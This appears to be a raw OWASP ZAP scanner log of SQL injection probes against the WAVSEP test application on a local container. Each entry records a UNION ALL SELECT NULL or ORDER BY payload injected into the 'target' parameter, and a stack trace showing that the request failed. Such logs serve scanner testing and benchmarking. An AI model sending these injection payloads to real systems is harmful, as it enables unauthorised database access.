- SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680926 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680927 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680928 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680929 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680930 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680931 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680931 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680932 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 5112#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 5112# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680933 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680933 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680934 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680934 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at 